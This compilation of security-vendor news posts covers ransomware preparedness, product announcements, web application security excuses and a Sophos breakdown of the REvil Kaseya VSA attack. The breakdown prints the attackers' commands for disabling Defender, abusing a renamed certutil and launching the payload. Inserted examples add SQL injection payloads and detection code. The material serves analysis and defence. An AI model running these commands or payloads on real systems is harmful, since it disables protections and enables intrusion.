News
Ransomware attacks have all but dominated news headlines in recent weeks. Managed service providers (MSPs) know the risks of ransomware and how important it is to have a plan in place to respond to an attack when they have an impacted client. There are many different factors to consider, but it’s best practice to have a strategy for detection, prevention, and response. We put together a comprehensive infographic on the journey of ransomware and how MSPs can prepare their clients – here’s a preview.
How Can MSPs Prevent Ransomware Attacks?
The reality is, there is no foolproof way to prevent a ransomware attack. Even the most protected and prepared businesses can fall victim to ransomware. However, MSPs can take steps to lower the chances of their SMB clients falling victim to an attack.
- Arm clients with antivirus. These tools have been around a long time but are still a critical part of a ransomware prevention strategy.
- Automate patch management. When software providers identify bugs, they publish that information and offer a patch. With automated patching, businesses are less likely to be exploited by bad actors looking to capitalize on those bugs.
- Implement tools with ransomware detection capabilities. Ransomware can infiltrate a business’s systems and go undetected for a long time. One way to drastically improve ransomware prevention is to have tools that identify it before it spreads across a network.
The Journey of Crypto-Ransomware: Detection, Response, and Prevention
In this infographic, we break down how ransomware is spread and share tips to help businesses establish plans to prevent, detect, and respond to ransomware attacks.
Detecting a Ransomware Attack
Ransomware attacks can go undetected, but there are ways to identify if a hacker may have impacted your client. Be sure your clients notify you if they see unusual changes to file names, lockout screens, or a pop-up with a ransom note.
Responding to a Ransomware Attack
If a ransomware attack is detected, it’s important to respond as quickly as possible. First, scan networks to confirm that an attack is underway, and once identified, isolate the infected computer(s) immediately. Immediately secure backup data or systems by taking them offline and ensure backups are free of malware. These are the immediate steps to take when alerted of an attack. From here, MSPs should focus on ensuring hackers can’t get back in.
These are just a few ways to prepare for a ransomware attack and are certainly not a comprehensive list. To learn more about how MSPs can help prevent their SMB clients from falling victim to a ransomware attack, take a look at our infographic, The Journey of Crypto-Ransomware: Detection, Response, and Prevention.
Source: Datto
The product team is pleased to announce the early access program for SFOS v18.5 MR1 for all Sophos (XG) Firewall devices and all SFOS form factors – XGS Series, XG Series, virtual and software appliances, as well as all supported cloud platforms.
SFOS v18.5 MR1 includes support for new Sophos Central Orchestration capabilities and a number of important security fixes and enhancements.
What’s new in v18.5 MR1
Support for new Central Orchestration subscription (included in the new Xstream Protection license bundle):
- Central SD-WAN VPN Orchestration enables easy point-and-click site-to-site VPN orchestration from Sophos Central – automatically configuring the necessary tunnels and firewall access rules for your desired SD-WAN overlay network.
- Central Firewall Reporting Advanced with 30-days of data retention for full multi-firewall reporting in Sophos Central with access to all pre-packaged reports, plus flexible custom report capabilities and the option to save, schedule, or export your reports.
- Sophos MTR/XDR connector to enable Sophos Firewall intelligence and data to be used as part of our 24/7 Managed Threat Response service, or as part of your self-managed, cross-product extended detection and response solution.
Get the full details on Central Orchestration and how to take advantage of it.
Additional enhancements:
- Resolved FragAttack vulnerabilities recently discovered in the Wi-Fi specification for all internal and add-on Wi-Fi modules for Sophos (XG) Firewall desktop series appliances. All other updates will follow as outlined in this advisory.
- Enhanced backup/restore support improves backup/restore operations across different models by better mapping the management ports. v18.5 MR1 can also restore backups from v18 MR5 and earlier, including any older v17.5 MRs.
- XGS Series reset button enables a long press of the hardware reset button on XGS Series appliances (XGS 116 and higher models) to perform a factory reset to help recover from a bad configuration.
- VPN tunnel logging adds improved logging of VPN tunnel flap events and IPsec IKEv2 rekeying.
- Sophos DDNS (myfirewall.com) will be discontinued and no longer supports new registrations. This is planned from January 31, 2022. Refer to KBA-41764 for more details.
How to get early access and provide feedback
This release is available for early access to all Sophos (XG) Firewall devices: XGS Series, XG Series, virtual, cloud, and all supported platforms running SFOS.
Get the full details and download links here.
You can provide early access feedback directly to the product team using the new and improved in-product feedback mechanism introduced with v18.5. Simply click the feedback link at the top right of the web console UI. Alternatively, you can provide your feedback via the community.
This release is expected to be generally available and rolled out automatically to all customer devices starting in early August.
Source: Sophos
Sophos acquired Capsule8. “I’m excited to share that Sophos has acquired Capsule8, a pioneer and market leader of runtime visibility, detection and response for Linux production servers and containers covering both on-premises and cloud workloads” said Dan Schiappa, Chief Product Officer at Sophos.
Sophos already protects more than two million servers for over 85,000 customers worldwide. Comprehensive server protection is a crucial component of any effective cybersecurity strategy. This deal expands our portfolio of Detection and Response Solutions and Services for underprotected server and cloud environments. It’s great news for anyone looking for a strong and lightweight layer of Linux security with strategically important visibility and detection for their servers and containers, and for organizations who want a single vendor for end-user compute and server workloads.
Linux servers: A growing vector of attack
Use of cloud platforms has grown considerably over recent years, and the pandemic further accelerated the move from on premises servers to cloud-based server workloads. With Linux now the dominant operating system for server workloads, it’s easy to understand why adversaries are adapting and customizing their approach to attack these systems.
SophosLabs threat intelligence reveals that adversaries are designing tactics, techniques and procedures (TTPs) aimed specifically at Linux systems, often exploiting server software as the initial entry point in their attack. Having a strong layer of Linux security is essential in defending against these attacks.
Extending Sophos protection
Our engineering team is already busy planning the integration of Capsule8 technology into our Adaptive Cybersecurity Ecosystem (ACE). We will also feature Capsule8 technology in our Extended Detection and Response (XDR) solutions, Intercept X server protection products, and Sophos Managed Threat Response (MTR) and Rapid Response services.
Capsule8 technology will provide new Linux telemetry and event information, further enhancing Sophos’ data lake with additional context for advanced threat hunting, security operations and customer protection practices. It also strengthens the ability of Sophos MTR operators and customers using Sophos XDR to find and neutralize suspicious activity before it becomes malicious.
The addition of the Capsule8 technologies to the Sophos portfolio is an exciting time for all of us at Sophos and I look forward to sharing further details of the integration later this year.
In the meantime, on behalf of Sophos I’d like to extend a warm welcome to the Capsule8 employees, customers and partners; we’re delighted to be working with you.
Source: Sophos
In the cybersecurity world, it’s only natural to balance risks and security measures. After all, there is no way to achieve absolute security and therefore you have to say stop somewhere. However, if you rely on excuses and underestimate the threats, you’re very likely to become a victim of a serious attack. Cybercriminals are smart – they attack those who make it easy for them.
I’ve seen businesses treat web application security as less important than, for example, having an antivirus. I can understand such an approach if a business just has a simple marketing site on WordPress. However, I cannot get my head around such carelessness if the business develops professional B2B web applications for huge corporations, which use these web applications to process tons of sensitive information! And yet, yes, this happens!
Here are some of the excuses that I’ve heard when it comes to web application security. I’m including them to help you avoid similar pitfalls when you decide how to proceed with your journey.
“Our software is only for internal use so there’s no attack risk”
The assumption that malicious hackers only attack web applications that are exposed to the public is one of the primary reasons for major data breaches. Not only are inside jobs quite common in the world of cybersecurity but attackers can find a way into the internal network and access internal web applications from there.
You should always treat the security of your web applications the same way no matter whether they are exposed to the public, used through internal networks and VPNs only, or protected by IP filtering and authentication. That means that, for example, if your application is accessible only from a selected range of IPs and requires authentication, it doesn’t mean it’s secure by design. Even worse, criminals may actually seek entry into such applications, in particular, knowing that their creators often treat vulnerabilities as less of a threat and therefore do not even check for them.
In conclusion, scan every application for security vulnerabilities, no matter how well it is protected by network security measures and authentication!
“Our implementation makes it impossible to have vulnerabilities”
I’ve heard this argument from a company that uses Hibernate ORM for its Java development. The construction of Hibernate supposedly eliminates SQL injection vulnerabilities because the database always returns a single result set. Unfortunately, that is not true. Only some SQL injection attacks are eliminated by this feature of Hibernate, not all of them. This feature also has no impact whatsoever on vulnerabilities that are not related to SQL.
While modern development and implementation environments make some attacks more difficult, there is no environment that can help you prevent all of them – or even a majority of them. If you think that the way that you designed your development and implementation is enough without any security testing included, think again.
In conclusion, test all your applications for security vulnerabilities no matter what development and implementation environments you use (even if they supposedly eliminate security errors).
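To make the Hibernate argument concrete, the following added example (not from the original article) reproduces the same property with Python’s sqlite3 module, whose execute() also runs only one statement at a time: the stacked-query attack is refused by the API, but a concatenated boolean payload still rewrites the WHERE clause and returns every row. The users table and its two rows are constructed for the demonstration; this is an analogue of the ORM situation, not Hibernate code.

```python
import sqlite3

# Constructed sample data: a tiny in-memory users table.
SAMPLE_USERS = [("alice", "alice@example.com"), ("bob", "bob@example.com")]


def _connect():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (name TEXT, email TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", SAMPLE_USERS)
    return conn


def lookup_concatenated(name):
    """Vulnerable lookup: the query is built by string concatenation.

    sqlite3's execute() runs exactly one statement and refuses a stacked
    second one, the same 'single result set' property the Hibernate
    argument relies on. Returns None when the API rejects the statement,
    otherwise the rows the (possibly attacker-modified) query produced."""
    sql = "SELECT name, email FROM users WHERE name = '" + name + "'"
    try:
        return _connect().execute(sql).fetchall()
    except (sqlite3.Warning, sqlite3.ProgrammingError):
        # e.g. "You can only execute one statement at a time."
        return None


def lookup_parameterized(name):
    """Hardened lookup: a bound parameter is never parsed as SQL syntax."""
    return _connect().execute(
        "SELECT name, email FROM users WHERE name = ?", (name,)
    ).fetchall()
```

lookup_concatenated("x'; DROP TABLE users; --") returns None because the driver refuses the second statement, which is the only class of attack the “single result set” property stops; lookup_concatenated("' OR '1'='1") still returns both users, while lookup_parameterized with the same payload returns nothing.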
“We run a security scan once in a while and we never found anything serious”
Some businesses believe that it’s enough to scan their applications every few months, for example, only before a major release. They do not see the need to verify the security of each release candidate and are even less keen to include security scanning as part of their regular DevOps pipelines. The argument is that the scans yielded no major problems up to date.
Such an approach may be compared to leaving your car door unlocked (and your keys in the ignition) in front of the supermarket. Sure, in the majority of cases, nothing will happen because there will be no car burglars around. However, if just one burglar is around and notices that your car is not locked, your vehicle will change its owner pretty quickly. Same in this case: just one major vulnerability that goes undetected between major releases may result in a security breach exposing all your sensitive data and ruining your business reputation.
In conclusion, test your supposedly safe applications even more thoroughly than the ones you’d think are unsafe.
Better safe than sorry
The phrase “better safe than sorry” is very applicable for cybersecurity (and security in general). In my opinion, whatever security decisions you make for your business, you should compare these with the security of your own personal assets. For example, if your apartment is in a block with security at the front door, does it mean you can leave your door unlocked? If no break-in happened in your neighborhood recently, does it mean that you can leave your window wide open when you go to work?
If instead of making excuses you try to assume the worst scenarios, you are much less likely to be the hero of the next headline news about a data breach. And the cost of including web application security in your SDLC compared to the losses that you could incur as a result of the data breach is just like the cost of a door lock compared to the cost of all the valuables in your home.
Make the right choice, not excuses.
Source: Acunetix
At Invicti, we are absolutely thrilled to be recognized for the first time in the Magic Quadrant for Application Security Testing this year.
Gartner is a leading IT research and advisory firm that helps businesses of all sizes evaluate technology and make informed decisions. We feel our acknowledgment in the report is a big deal, especially for a company of our size, and it marks a recognition by Gartner that the application security testing market and technology landscape are evolving. We believe that our approach is at the vanguard of that evolution.
Application security testing is a broad category. It includes everything from software composition analysis (SCA) to static, dynamic, and interactive application security testing. And while traditional SCA and static application security testing (SAST) certainly have their place, especially for taking inventory of open-source components and analyzing source code, a complete security program also requires DAST and IAST.
We are the only vendor in the Magic Quadrant that takes our approach to provide an orchestrated DAST and IAST platform. Invicti Security has intentionally developed Netsparker and Acunetix to uniquely orchestrate DAST and IAST, enabling organizations of all sizes to build a continuous and automated web application security practice.
Our mission is to enable you to vastly improve your security posture with scale and automation, and we do it by delivering unique products. We feel only Invicti – with our DAST, IAST, and dynamic SCA – can cover all of your apps (in development, in production, and even third-party). And only Invicti can do this with the scale, speed, accuracy, and automation you need for your agile (or DevOps) environment.
Bottom line: our intelligent automation, 50+ integrations, and benchmark low rate of false positives make us stand out in a very crowded field of players in application security.
Of course, we’re only getting started. We’ve got lots in store as we continue to innovate on both Netsparker and Acunetix. We look forward to pushing the market to a more modern and scalable approach to application security.
Interested parties can access the full 2021 Gartner Magic Quadrant for Application Security Testing here.
Source: Acunetix
On July 2, while many businesses had staff either already off or preparing for a long holiday weekend, an affiliate of the REvil ransomware group launched a widespread crypto-extortion gambit. Using an exploit of Kaseya’s VSA remote management service, the REvil actors launched a malicious update package that targeted customers of managed service providers and enterprise users of the on-site version of Kaseya’s VSA remote monitoring and management platform.
REvil is a ransomware-as-a-service (RaaS), delivered by “affiliate” actor groups who are paid by the ransomware’s developers. Customers of managed service providers have been a target of REvil affiliates and other ransomware operators in the past, including a ransomware outbreak in 2019 (later attributed to REvil) that affected over 20 small local governments in Texas. And with the decline of several other RaaS offerings, REvil has become more active. Its affiliates have been exceedingly persistent in their efforts as of late, continuously working to subvert malware protection. In this particular outbreak, the REvil actors not only found a new vulnerability in Kaseya’s supply chain, but used a malware protection program as the delivery vehicle for the REvil ransomware code.
REvil’s operators posted to their “Happy Blog” today, claiming that more than a million individual devices were infected by the malicious update. They also said that they would be willing to provide a universal decryptor for victims of the attack, on the condition that they be paid $70,000,000 worth of Bitcoin.
Managed Malware Delivery
The outbreak was delivered via a malicious update payload sent out to VSA servers, and in turn to the VSA agent applications running on managed Windows devices. It appears this was achieved using a zero-day exploit of the server platform. This gave REvil cover in several ways: it allowed initial compromise through a trusted channel, and it leveraged trust in the VSA agent code, reflected in the anti-malware exclusions that Kaseya requires at set-up for its application and agent “working” folders. Anything executed by the Kaseya Agent Monitor is therefore ignored because of those exclusions, which allowed REvil to deploy its dropper without scrutiny.
The Kaseya Agent Monitor (at C:\PROGRAM FILES (X86)\KASEYA\<ID>\AGENTMON.EXE, where <ID> is the identification key of the server the monitor instance connects to) in turn wrote the Base64-encoded malicious payload AGENT.CRT to the VSA agent “working” directory for updates (by default, C:\KWORKING). AGENT.CRT is encoded to stop malware defenses from performing static file analysis (pattern scanning and machine learning) when it is dropped. These technologies normally work on executable files, though, as noted above, since this file was dropped into the “working” directory excluded under Kaseya’s requirements, they would not likely have come into play anyway.
After dropping the payload, the Kaseya agent ran the following Windows shell commands, concatenated into a single string. Here’s a breakdown of each command:
ping 127.0.0.1 -n 5693 > nul
The first command is essentially a timer. The -n parameter instructs the Windows PING.EXE tool to send the given number of echo requests to localhost (127.0.0.1), in this case 5,693, with roughly a second between them. This acted as a “sleep” function, delaying the subsequent PowerShell command for about 5,693 seconds, or roughly 94 minutes. The value varied per victim, indicating that it was randomly generated on each VSA server as part of the agent procedure that sent the malicious command down to victims.
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
The next part of the command string is a PowerShell command that attempts to disable core malware and anti-ransomware protections offered by Microsoft Defender:
- Real-time protection
- Network protection against exploitation of known vulnerabilities
- Scanning of all downloaded files and attachments
- Scanning of scripts
- Ransomware protection
- Protection that prevents any application from gaining access to dangerous domains that may host phishing scams, exploits, and other malicious content on the Internet
- Sharing of potential threat information with Microsoft Active Protection Service (MAPS)
- Automatic sample submission to Microsoft
These features are turned off to prevent Microsoft Defender from potentially blocking subsequent malicious files and activity.
copy /Y C:\Windows\System32\certutil.exe C:\Windows\cert.exe
This creates a copy of the Windows certificate utility, CERTUTIL.EXE, a frequently abused Living-Off-the-Land Binary (LOLBin) capable of downloading files and decoding Base64-encoded content. The copy is written to C:\WINDOWS\CERT.EXE.
echo %RANDOM% >> C:\Windows\cert.exe
This appends a random integer (cmd.exe’s %RANDOM% value, between 0 and 32767) to the end of the copied CERTUTIL, changing its hash. This may have been an attempt to stop anti-malware products that watch for CERTUTIL abuse from recognizing CERT.EXE as a CERTUTIL copy by signature.
C:\Windows\cert.exe -decode c:\kworking\agent.crt c:\kworking\agent.exe
The copied CERTUTIL is used to decode the Base64-encoded payload file AGENT.CRT and write it out as an executable, AGENT.EXE, in the Kaseya working folder. AGENT.EXE carries a valid Authenticode signature made with a certificate issued to “PB03 TRANSPORT LTD.” We have only seen this certificate associated with REvil malware; it may be stolen or fraudulently obtained. AGENT.EXE contains a compiler timestamp of July 1, 2021 (14:40:29), a day before the attack.

del /q /f c:\kworking\agent.crt C:\Windows\cert.exe
The original payload file C:\KWORKING\AGENT.CRT and the copy of CERTUTIL are deleted.
c:\kworking\agent.exe
Finally, AGENT.EXE is started by Kaseya’s AGENTMON.EXE process (inheriting its system-level privilege)—and the actual dropping of ransomware begins.
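As an added example (not part of the Sophos write-up), here is a detector that splits a process-creation command line on cmd.exe separators and looks for the chain above: the ping timer, Defender tampering through Set-MpPreference, the certutil copy, its mutation with %RANDOM%, decoding with the renamed copy, cleanup of the copy, and execution of the decoded output. The sample command line joins the individual commands shown above with “&” (the separator is our assumption; the original concatenated string is not reproduced here), and the two benign lines and the 60-second sleep threshold are also ours.

```python
import re

# Constructed sample process-creation command lines. The first joins the
# individual commands from the write-up with "&" (the join character is our
# assumption). The other two are benign look-alikes a detector must not flag.
SAMPLE_COMMAND_LINES = [
    r"ping 127.0.0.1 -n 5693 > nul & "
    r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Set-MpPreference "
    r"-DisableRealtimeMonitoring $true -DisableIntrusionPreventionSystem $true "
    r"-DisableIOAVProtection $true -DisableScriptScanning $true "
    r"-EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode "
    r"-Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend & "
    r"copy /Y C:\Windows\System32\certutil.exe C:\Windows\cert.exe & "
    r"echo %RANDOM% >> C:\Windows\cert.exe & "
    r"C:\Windows\cert.exe -decode c:\kworking\agent.crt c:\kworking\agent.exe & "
    r"del /q /f c:\kworking\agent.crt C:\Windows\cert.exe & "
    r"c:\kworking\agent.exe",
    r"ping 127.0.0.1 -n 3 > nul & echo done",
    r"certutil.exe -hashfile C:\Users\admin\Downloads\setup.msi SHA256",
]

PING_SLEEP = re.compile(r"^ping\s+127\.0\.0\.1\s+-n\s+(\d+)", re.I)
MP_PREF = re.compile(r"Set-MpPreference\b(.*)", re.I)
# One alternative per Defender setting the chain turns off; each findall()
# tuple has exactly one non-empty group naming the tampered setting.
TAMPER_FLAGS = re.compile(
    r"-(Disable\w+)\s+\$true|-(EnableControlledFolderAccess)\s+Disabled"
    r"|-(EnableNetworkProtection)\s+AuditMode|-(MAPSReporting)\s+Disabled"
    r"|-(SubmitSamplesConsent)\s+NeverSend", re.I)
COPY_CERTUTIL = re.compile(r"^copy\s+(?:/y\s+)?\S*certutil\.exe\s+(\S+)", re.I)
RANDOM_APPEND = re.compile(r"^echo\s+%RANDOM%\s*>>\s*(\S+)", re.I)
DECODE = re.compile(r"^(\S+)\s+-decode\s+(\S+)\s+(\S+)", re.I)
DEL = re.compile(r"^del\b", re.I)


def split_chain(cmdline):
    """Split a cmd.exe line on '&' / '&&' (quoting and '2>&1'-style
    redirects are ignored for brevity)."""
    return [p.strip() for p in re.split(r"&&?", cmdline) if p.strip()]


def analyze(cmdline, min_sleep_seconds=60):
    """Return an ordered list of (indicator, detail) tuples found in cmdline.
    min_sleep_seconds is our own threshold for treating ping as a timer."""
    findings, copies, decoded = [], set(), set()
    for part in split_chain(cmdline):
        low = part.lower()
        if m := PING_SLEEP.match(part):
            if int(m.group(1)) >= min_sleep_seconds:
                findings.append(("ping_sleep", int(m.group(1))))
        elif m := MP_PREF.search(part):
            flags = [next(g for g in groups if g)
                     for groups in TAMPER_FLAGS.findall(m.group(1))]
            if flags:
                findings.append(("defender_tamper", flags))
        elif m := COPY_CERTUTIL.match(part):
            copies.add(m.group(1).lower())          # remember where certutil went
            findings.append(("certutil_copy", m.group(1)))
        elif m := RANDOM_APPEND.match(part):
            if m.group(1).lower() in copies:        # hash changed to dodge signatures
                findings.append(("copy_mutated", m.group(1)))
        elif m := DECODE.match(part):
            tool, _src, dst = m.groups()
            decoded.add(dst.lower())                # remember the decoded output
            tag = "decode_via_renamed_certutil" if tool.lower() in copies else "certutil_decode"
            findings.append((tag, dst))
        elif DEL.match(part):
            if any(c in low for c in copies):       # anti-forensic cleanup of the copy
                findings.append(("copy_deleted", sorted(copies)))
        elif low in decoded:                        # the decoded file is run directly
            findings.append(("decoded_payload_executed", part))
    return findings


def verdict(cmdline):
    """'malicious' when the decode-and-run chain is complete, 'suspicious'
    for any lone indicator, otherwise 'clean'."""
    tags = {t for t, _ in analyze(cmdline)}
    if {"decode_via_renamed_certutil", "decoded_payload_executed"} <= tags:
        return "malicious"
    return "suspicious" if tags else "clean"
```

Linking the copy destination to the later -decode and execution steps is what separates this chain from ordinary certutil use (the hashfile line above is not flagged); a single indicator such as a long ping is only reported as suspicious.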
Side-loading for stealth

AGENT.EXE dropped an unexpected file: MSMPENG.EXE, an outdated and expired version of Microsoft’s Antimalware Service executable. This is a benign yet vulnerable application from Windows Defender, version 4.5.218.0, signed by Microsoft on March 23, 2014:
This version of MSMPENG.EXE is vulnerable to side-loading attacks—and we’ve seen this particular version of the application abused before. In a side-load attack, malicious code is put into a dynamic link library (DLL) named to match one required by the targeted executable, and usually placed into the same folder as the executable so it is found before a legitimate copy.
In this case, AGENT.EXE dropped a malicious file named MPSVC.DLL alongside the MSMPENG.EXE executable. AGENT.EXE then executes MSMPENG.EXE, which, following the normal DLL search order, finds the malicious MPSVC.DLL in its own directory and loads it into its own memory space.
The MPSVC.DLL also contains the “PB03 TRANSPORT LTD.” certificate that was applied to AGENT.EXE. The MPSVC.DLL appears to have been compiled on Thursday July 1, 2021 (14:39:06), just prior to the compilation of AGENT.EXE.
From that moment on, the malicious code in MPSVC.DLL hijacks the normal execution flow of the Microsoft branded process, when MSMPENG.EXE calls the ServiceCrtMain function in the malicious MPSVC.DLL (this is also the main function in a benign MPSVC.DLL):

The MSMPENG.EXE, now under control of the malicious MPSVC.DLL, begins to encrypt the local disk, connected removable drives and mapped network drives, all from a Microsoft signed application that security controls typically trust and allow to run unhindered.
From here on out, this REvil ransomware is technically very similar to other recent REvil extortion operations. It executes a NetShell (netsh) command to change firewall settings so that the local Windows system can be discovered on the local network by other computers (netsh advfirewall firewall set rule group="Network Discovery" new enable=Yes). Then it begins encrypting files.
The REvil ransomware performs an in-place encryption attack, and so the encrypted documents are stored on the same sectors as the original unencrypted document, making it impossible to recover the originals with data recovery tools. REvil’s efficient file system activity shows specific operations, performed on dedicated threads:
The ransomware runs storage access (the reading of original documents and writing of encrypted document), key-blob embedding, and document renaming on multiple individual threads for doing faster damage. As each file is encrypted, a random extension is added to the end of its name.
Step | Thread | Operation | Purpose |
---|---|---|---|
1 | A | CreateFile (Generic Read) | Open original document for reading only. |
2 | A | ReadFile | Read last 232 bytes of original document (look for decryption blob.) |
3 | A | CloseFile | Close original document (no changes made.) |
4 | A | CreateFile (Generic Read/Write) | Open original document for reading and writing. |
5 | B | ReadFile | Read original document. |
6 | C | WriteFile | Write encrypted document in original document. |
7 | C | WriteFile | Add decryption blob, 232 bytes, to end of file. |
8 | B | CloseFile | Close now-encrypted document. |
9 | B | CreateFile (Read Attributes) | Open encrypted document. |
10 | B | SetRenameInformationFile | Rename document by adding a file type extension, for example ‘.w3d1s’. |
11 | B | CloseFile | Close now renamed encrypted file. |
A ransom note is dropped using the same random extension as part of the filename (for example, “39ats40-readme.txt”.)
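The table above describes a behavioral signature that an endpoint sensor can look for without any knowledge of the REvil binary. The following added Python example (ours, not Sophos’s CryptoGuard logic) replays a constructed file-operation event stream built from that table for two documents, plus a benign editor save and the ransom note drop, and flags files that are opened read/write as existing files, overwritten from offset 0 and then renamed to a random-looking extension. Paths, the extension heuristic and the two-file alert threshold are constructed assumptions.

```python
import re
from collections import defaultdict

# Extensions treated as legitimate document types (short allow-list, constructed).
KNOWN_EXT = {".docx", ".xlsx", ".pdf", ".txt", ".jpg", ".tmp", ".bak"}
# Random-looking REvil-style extension: 4-8 lowercase alphanumerics (our heuristic).
RANDOM_EXT = re.compile(r"^\.[a-z0-9]{4,8}$")

DOCS = r"C:\Users\jo\Docs"   # constructed victim folder


def revil_sequence(name, ext):
    """Constructed per-file event stream following the table above:
    (thread, op, path, detail)."""
    p = DOCS + "\\" + name
    return [
        ("A", "CreateFile", p, "Generic Read, Open"),
        ("A", "ReadFile", p, "offset=eof-232"),      # look for an existing key blob
        ("A", "CloseFile", p, ""),
        ("A", "CreateFile", p, "Generic Read/Write, Open"),
        ("B", "ReadFile", p, "offset=0"),
        ("C", "WriteFile", p, "offset=0"),           # ciphertext over the original sectors
        ("C", "WriteFile", p, "offset=eof"),         # 232-byte key blob appended
        ("B", "CloseFile", p, ""),
        ("B", "CreateFile", p, "Read Attributes, Open"),
        ("B", "SetRenameInformationFile", p, p + ext),
        ("B", "CloseFile", p + ext, ""),
    ]


def editor_save(name):
    """Constructed benign save: write a fresh temp file, then rename it over the original."""
    tmp, final = DOCS + "\\" + name + ".tmp", DOCS + "\\" + name
    return [
        ("E", "CreateFile", tmp, "Generic Read/Write, Create"),
        ("E", "WriteFile", tmp, "offset=0"),
        ("E", "CloseFile", tmp, ""),
        ("E", "SetRenameInformationFile", tmp, final),
    ]


SAMPLE_EVENTS = (
    revil_sequence("report.docx", ".w3d1s")
    + revil_sequence("budget.xlsx", ".w3d1s")
    + editor_save("notes.txt")
    + [("D", "CreateFile", DOCS + "\\w3d1s-readme.txt", "Generic Write, Create")]
)


def detect_inplace_encryption(events, min_files=2):
    """Flag files that are opened read/write as existing files, overwritten
    from offset 0, then renamed to a random-looking extension; pair that
    extension with any '<ext>-readme.txt' note. min_files is our alert threshold."""
    stage = defaultdict(int)   # path -> 0 untouched, 1 opened RW, 2 overwritten in place
    hits, exts, notes = [], set(), []
    for _thread, op, path, detail in events:
        key = path.lower()
        if op == "CreateFile":
            if "Read/Write" in detail and "Open" in detail:
                stage[key] = 1                       # existing file opened for writing
            elif "Create" in detail:
                base = key.rsplit("\\", 1)[-1]
                if base.endswith("-readme.txt"):
                    notes.append(base[: -len("-readme.txt")])
        elif op == "WriteFile" and detail == "offset=0" and stage[key] == 1:
            stage[key] = 2                           # original content overwritten in place
        elif op == "SetRenameInformationFile" and stage[key] == 2:
            ext = ("." + detail.rsplit(".", 1)[1]).lower() if "." in detail else ""
            if ext not in KNOWN_EXT and RANDOM_EXT.match(ext):
                hits.append((path, detail))
                exts.add(ext[1:])
            stage[key] = 0
    return {
        "alert": len(hits) >= min_files,
        "files": hits,
        "ransom_notes": [n for n in notes if n in exts],
    }
```

The editor save is not flagged because it writes a newly created temp file rather than overwriting an opened one; the in-place overwrite followed by the rename is the part of the pattern that matters, since, as noted above, the original sectors are gone once the write lands.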
There are some factors that stand out in this attack when compared to others. First, because of its mass deployment, this REvil attack makes no apparent effort to exfiltrate data. Attacks were customized to some degree based on the size of the organization, meaning that REvil actors had access to VSA server instances and were able to identify individual customers of MSPs as being different from larger organizations. And there was no sign of deletion of volume shadow copies—a behavior common among ransomware that triggers many malware defenses.
Stage | Activity |
---|---|
0 | The main install command |
1 | PowerShell command attempts to stop Windows Defender |
2 | Renamed CERTUTIL.EXE decodes AGENT.EXE from AGENT.CRT |
3 | AGENT.EXE is executed, drops MSMPENG.EXE and MPSVC.DLL into C:\Windows |
4 | MSMPENG.EXE is executed, and side-loads the REvil DLL |
5 | Files are encrypted, ransom note created |
6 | Netsh.exe turns on network discovery |
Here’s a video demonstrating how the attack works:
Lessons learned
The tactics to evade malware protection used here—poisoning a supply-chain well, taking advantage of vendor carve-outs from malware protection, and side-loading with an otherwise benign (and Microsoft-signed) process—are all very sophisticated. They also show the potential risks of excluding anti-malware protection from folders where automated tasks write and execute new files. While zero-day supply-chain exploits are rare, we’ve already seen two major systems management platforms exploited in the past year. While Sunburst was apparently a state-funded attack, ransomware operators clearly have the resources to continue to acquire additional exploits.
Even so, the anti-malware evasion used by this REvil attack was not unstoppable, and was detected by a number of antimalware products. The REvil payload itself was detectable by Sophos as Mal/Generic-S by Intercept X, and Troj/Ransom-GIP and Troj/Ransom-GIS, as well as HPmal/Sodino-A in on-premises protection products. The REvil-specific code certificate is also detected as Mal/BadCert-Gen. While the protection exclusions may have allowed the REvil dropper to be installed on machines, the ransomware itself was detected. Intercept X’s cryptoransomware protection feature is not constrained by folder exclusions, and would block file encryption anywhere on protected drives.
Source: Sophos
We are pleased to announce that today, June 24, Intercept X now supports Windows ARM64 devices. This is an exciting milestone, as devices using ARM64 processors are increasingly common in many organizations.
Available to all Intercept X customers, this initial release includes many of the powerful defensive capabilities of Intercept X, with more features being added later this year. To start protecting your Windows ARM64 devices, you simply need to log into your Sophos Central console and run the Windows installer.
Which products are supported?
- Intercept X Advanced
- Intercept X Advanced with EDR
- Managed Threat Response (MTR Standard and MTR Advanced)
Which features are available now?
- Deep learning file scanning
- Anti-ransomware (CryptoGuard)
- Application control
- Web protection
- Cross-estate SQL querying for threat hunting and IT security operations hygiene (Live Discover, EDR)
- Remote Terminal access for further investigation and response (Live Response, EDR)
What’s coming later?
- Web control
- Device control
- Endpoint Firewall
- File Download Reputation
- DLP
- Device encryption (Central Device Encryption)
Getting started
Existing customers simply need to run the Windows installer available in Sophos Central on their ARM64 devices.
If you’re new to Intercept X, try an online demo or free trial.
Source: Sophos
Addressing an organization’s data security challenges requires some heavy lifting – no question about it. Whether data security worries center around internal security lapses or stem from the harsh reality of being targeted by those with malicious intent, organizations face a constant need to be on the alert and protective of sensitive data.
Rather than cobble together a piecemeal solution strategy, relying on a trusted solutions provider that offers a suite of integrated, scalable data security solutions can provide relief. Knowing what data needs to be protected, classifying the data, applying controls to the data without slowing down business processes, and sharing all this sensitive data securely can provide IT and security leaders peace of mind.
The Challenge of Gaining Data Visibility
With the massive amount of data exchanged daily, knowing what data exists, where it lives, who can access it, and how it is ultimately sent is critical to organizational data security. The visibility factor is naturally a concern for CISOs, as a recent HelpSystems data security study attests and is square one when it comes to data security and the policies and solutions needed for a proactive security stance.
Diving into true data visibility includes defining policies and procedures, ensuring they are working and being used, and then assessing which technologies can be put in place to help automatically and efficiently bolster the security needed around sensitive data.
The Challenge of Identifying What Data Needs Protection
To keep the flow of business running for mission-critical communications and not throw unnecessary productivity barriers up, it’s important to first address the fact that not all the vast amount of data exchanged is equal and in need of extensive protection.
Implementing a data classification solution that applies markers and halts only the data that meets the protection criteria you set can help ensure business keeps running (minus potential data breaches). Metadata labels allow other security solutions within the environment to understand which data is sensitive and requires further protection along its journey, based on the organizational policy set.
With data classification in place, you can identify and sort out what data is sensitive and in need of protection and which is more mundane and shareable without the more nuanced layers of security to streamline secure data exchanges.
